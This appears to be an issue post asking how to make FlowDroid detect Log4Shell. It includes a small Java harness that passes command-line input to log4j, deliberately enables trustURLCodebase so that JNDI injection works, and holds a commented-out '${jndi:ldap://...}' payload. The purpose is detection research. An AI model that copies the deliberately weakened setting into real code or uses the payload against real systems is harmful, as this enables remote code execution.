Open
Description
I wanted to get a FlowDroid rig to detect the log4shell exploit - any tips?
This could would be the minimum test rig? It takes an arbitrary string from the command line.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class log4j {
private static final Logger logger = LogManager.getLogger(log4j.class);
public static void main(String[] args) {
//高版本的jdk默认trustURLCodebase为false,因此不能成功利用JNDI注入
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
// logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}");
logger.error(args[1]);
}
}